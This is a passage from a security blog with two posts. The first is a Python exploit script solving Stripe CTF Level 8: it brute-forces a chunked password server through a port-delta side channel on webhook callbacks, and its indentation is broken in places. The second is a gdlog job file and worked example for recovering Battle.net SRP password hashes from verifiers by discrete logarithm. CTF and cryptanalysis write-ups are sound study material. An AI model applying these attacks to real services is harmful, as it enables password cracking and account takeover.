codezen.fr code hacking, zen coding

30Aug/12Off

Stripe CTF Level 8 Solution

Posted by aXs

Quick solution post before leaving for vacation for Stripe's CTF Level 8.

#!/usr/bin/env python
# aXs - http://codezen.fr
#
# Stripe CTF Level 8

import time
import requests
import socket
import threading
import SocketServer
import Queue
import json
import random
import sys

remote_port = 0

q = Queue.Queue(maxsize=0)

class ThreadedTCPRequestHandler(SocketServer.BaseRequestHandler):

  def handle(self):
    global remote_port
    data = self.request.recv(1024)
    client_ip, client_port = self.client_address
    #print client_ip, client_port
    delta = client_port - remote_port
    remote_port = client_port
    self.request.close()
    q.put(delta)

class ThreadedTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
  pass

if __name__ == "__main__":
  # Port 0 means to select an arbitrary unused port
  HOST, PORT = "0.0.0.0", 0

  server = ThreadedTCPServer((HOST, PORT), ThreadedTCPRequestHandler)
  ip, port = server.server_address

  server_thread = threading.Thread(target=server.serve_forever)
  server_thread.daemon = True
  server_thread.start()
  print "Server loop running in thread:", server_thread.name

  endpoint = "https://level08-3.stripe-ctf.com/user-oxtxhpbwuz/"

  numbers = range(0,1000)
  random.shuffle(numbers)

  #numbers = ['641', '243', '093', '589', '728']

  candidate = []

  chunk = 1 # increment after each found chunk
  found = "" # add found chunk here
  level2_ip = "10.0.2.134"

  while len(numbers):
    i = int(numbers.pop())
    print "Moving to " + str(i)
    guess = str(i).zfill(3)
    body = '{"password": "' + found + str(guess) + 'A'*((4-chunk)*3) + '", "webhooks": ["' + level2_ip + ':'+str(port)+'"]}'

    delta = 0
    while delta>(chunk+2) or delta<1:
    resp = requests.post(endpoint, data=body)
    delta = q.get()
    result = json.loads(resp.text)
    print resp.text, result
    if result['success'] == True: # true for last chunk only
      print "WIIIIIIIIN"
      sys.exit()

    if delta == (chunk+2):
    print "CANDIDATE=", guess, resp.text
    candidate.append(guess)

    print guess + "|" + str(delta)

  print repr(candidate)

  server.shutdown()
Share
Tagged as: Comments Off
12Aug/12Off

Sample gdlog job file for Battle.net SRP

Posted by aXs

[Update 12Aug: I tuned the spStep parameters to generate more relations. Otherwise solving may fail for some target]

See RFC 2945 for details on SRP and this reference for Blizzard's specific implementation.

g is well-know 47

p is well-know N 112624315653284427036559548610503669920632123929604336254260115573677366691719

q = (p-1)/2

t (target) is your verifier such v = g^x % N

gdlog will give you back a 160bit x, salted SHA1 of username and password such as x = SHA1(s, SHA1(C, ":", P))

Our gdlog job file is like this:

p: 112624315653284427036559548610503669920632123929604336254260115573677366691719
q: 56312157826642213518279774305251834960316061964802168127130057786838683345859
job:srp
sieveType:page

f0:[ -23817613149476351568408250 7348740330559081441686124 5493570054426813646951125 ]
f1:[ 98 -9 -98 1 ]
m: 3430716947829154018307671961632018816844127594664356203325504368794740097415
skew: 1
# Alpha(f0)=-1.13722 Alpha(f1)=-0.0396682
# E(f0)=0.00028881 E(f1)=1000
# I(f0, S)=58.2395 I(f1, S)=3.99381
# Pair rating =0.00028881
b0:135090
b1:270181
lpb0:337725
lpb1:675452
lpf2exp0: 37
lpf2exp1:39
err_log0:36
err_log1:38
sp0:135090
sp1:202635
spi:0
spStep:100000
lc0Fact:[3 5 5 5 7 11 190253508378417788639]
p1Fact:[2 56312157826642213518279774305251834960316061964802168127130057786838683345859]
t:35873932978976964289906001423519899977549558494468550338642058985871400867383
g:47

Example:

Generate SRP handshake:

g= 47
N= 112624315653284427036559548610503669920632123929604336254260115573677366691719
x= 1424247726466781758056184792317997759091651621231
username:breith
password: ouille
salt: 0x101010101010101010101010101010101010101010101010101010101010101L
v: 0x2847f9a6e5ece61e8c97edd6e0e8d527d0c59991c4f69dcae63aae948b629cd1L

gdlog gives back, after 2 hours on a quad-core i5, for this v:

Logarithm of the 18219683119335387768214778163247823001174424798682531185510722886446717508817 to the 47 is 1424247726466781758056184792317997759091651621231

1424247726466781758056184792317997759091651621231 is indeed our x

Share
Tagged as: No Comments